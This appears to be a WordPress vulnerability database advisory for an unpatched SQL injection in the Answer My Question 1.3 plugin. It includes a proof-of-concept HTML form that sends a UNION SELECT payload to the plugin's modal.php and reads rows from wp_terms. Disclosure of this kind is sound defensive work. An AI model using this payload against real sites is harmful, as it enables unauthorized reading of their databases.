Answer My Question 1.3 – SQL Injection | Plugin Vulnerabilities

Description

$_POST['id'] is not escaped. Url is accessible for any user.
Url vulnerable : http://target/wp-content/plugins/answer-my-question/modal.php

Proof of Concept

<form method="post" action="http://target/wp-content/plugins/answer-my-question/modal.php">
    <input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
    <input type="submit" value="Send">
</form>

Affects Plugins

answer-my-question

No known fix

References

Exploitdb

URL

https://lenonleite.com.br/en/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br/en/

Submitter twitter

Verified

No

WPVDB ID

9888ee42-a414-45ea-ba8c-3cdcc0e8d860

Timeline

Publicly Published

2016-11-17 (about 9 years ago)

Added

2016-11-21 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2014-09-19

Title

YAWPP < 1.2.2 - SQL Injection

Published

2024-10-30

Title

Administrator Z < 2024.10.21 - Subscriber+ SQL Injection

Published

2024-03-25

Title

WooCommerce Customers Manager < 29.7 - Subscriber+ SQL Injection

Published

2024-06-10

Title

Music Store - WordPress eCommerce < 1.1.14 - Authenticated (Admin+) SQL Injection

Published

2024-11-10

Title

JSP Store Locator <= 1.0 - Contributor+ SQL Injection